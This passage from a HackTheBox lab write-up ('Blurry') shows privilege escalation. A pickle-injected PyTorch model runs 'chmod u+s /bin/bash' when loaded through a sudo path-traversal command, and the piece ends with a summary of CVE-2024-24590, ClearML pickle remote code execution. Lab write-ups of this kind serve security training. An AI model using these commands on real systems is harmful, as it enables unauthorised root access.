Now we have to make a copy of <code>/models/demo_model.pth</code> file to <code>/tmp</code> and use the script to inject code.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span><span style=color:#fabd2f>cd</span> /tmp
</span></span><span style=display:flex><span>cp /models/demo_model.pth .
</span></span><span style=display:flex><span>python3 main.py ./demo_model.pth system <span style=color:#b8bb26>&#39;chmod u+s /bin/bash&#39;</span>
</span></span></code></pre></div><p>This will modify the original model that now executes <code>chmod u+s /bin/bash</code> and also create a backup of the original file.</p><figure><img src=/img/blurry/Pasted%20image%2020241013161804.webp></figure><p>Now we just have to move this updated model into <code>/models/</code> and run it with <code>/usr/bin/evaluate_model</code> command.</p><figure><img src=/img/blurry/Pasted%20image%2020241013162052.webp></figure><p>Since there&rsquo;s an <code>*</code> in the path, we don&rsquo;t exactly need to move the updated model into the <code>/models/</code> directory.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>sudo /usr/bin/evaluate_model /models/../tmp/demo_model.pth
</span></span></code></pre></div><figure><img src=/img/blurry/Pasted%20image%2020241013162253.webp></figure><p>And we are root.</p><p>This machine mainly focuses on addressing security aspects essential for maintaining robust MLOps practices.
We explored the exploitation of a remote code execution vulnerability (CVE-2024-24590) in ClearML through malicious artifact uploads. By leveraging the insecure deserialization of pickle files, we demonstrated how an attacker could execute arbitrary code on a victim&rsquo;s system. We also discussed the privilege escalation technique, using a crafted PyTorch model to gain root access.</p><h4 id=references><a href=#references class=anchor-head aria-label=Anchor></a>References:</h4><ul><li><a href=https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/>Machine Learning Operations: What You Need to Know Now - HiddenLayer</a></li><li><a href=https://www.hackingarticles.in/python-serialization-vulnerabilities-pickle/>Python Serialization Vulnerabilities – Pickle</a></li><li><a href=https://intoli.com/blog/dangerous-pickles/>Dangerous Pickles — Malicious Python Serialization</a></li><li><a href=https://hiddenlayer.com/research/weaponizing-machine-learning-models-with-ransomware/>Weaponizing ML Models with Ransomware</a></li></ul></div></article></main><aside id=sticky-top><div class=toc-title><p>Blurry | HackTheBox</p><hr id=toc-hr></div><nav id=toc class=toc-container><nav id=TableOfContents><ul><li><ul><li><a href=#overview>Overview</a></li></ul></li><li><a href=#information-gathering>Information Gathering</a></li><li><a href=#enumeration>Enumeration</a><ul><li><a href=#port-80---http-nginx-1180>Port 80 - HTTP (Nginx 1.18.0)</a></li></ul></li><li><a href=#exploitation>Exploitation</a><ul><li><a href=#cve-2024-24590---clearml-pickle-artifact-upload-rce>CVE-2024-24590 - ClearML Pickle Artifact Upload RCE</a></li></ul></li><li><a href=#privilege-escalation>Privilege Escalation</a><ul><li><a href=#local-enumeration>Local Enumeration</a></li><li><a href=#privilege-escalation-1>Privilege Escalation</a></li></ul></li></ul></nav></nav></aside><small class=post-updated-at>updated at 2024-10-13</small><hr><div class=series-nav><div class="alert alert-note"><div class=alert-heading-box><a href=https://h4r1337.github.io/series/hack-the-box/><p class=alert-heading>Hack the Box Series</p></a></div></div><nav class=post-nav style=margin-top:1rem;border-top:none><a class="post-nav-item post-nav-prev" href=https://h4r1337.github.io/posts/board-light/><div class=nav-arrow>Previous in series</div><span class=post-title>BoardLight | HackTheBox</span>
</a><a class="post-nav-item post-nav-next" href=https://h4r1337.github.io/posts/permx/><div class=nav-arrow>Next in series</div><span class=post-title>PermX | HackTheBox</span></a></nav></div><nav class=post-nav><a class="post-nav-item post-nav-prev" href=https://h4r1337.github.io/posts/board-light/><div class=nav-arrow>Previous</div><span class=post-title>BoardLight | HackTheBox</span>
</a><a class="post-nav-item post-nav-next" href=https://h4r1337.github.io/posts/permx/><div class=nav-arrow>Next</div><span class=post-title>PermX | HackTheBox</span></a></nav></div><footer class=footer><a class=footer_item href=javascript::void(0)>resume</a>
<a class=footer_item href=/index.xml>rss</a>
<span class=footer_item>&copy; 2026</span>
<small class=footer_copyright><a href=https://github.com/h4r1337/hugo-klise target=_blank rel="noreferrer noopener">hugo-klisé</a>
theme on
<a href=https://gohugo.io target=_blank rel="noreferrer noopener">Hugo</a><br><span>Made by <a href=https://github.com/h4r1337 target=_blank rel="noreferrer noopener">h4r1337</a></span></small></footer><script src=/js/main.js defer></script><script src=/js/toc.js defer></script></body></html>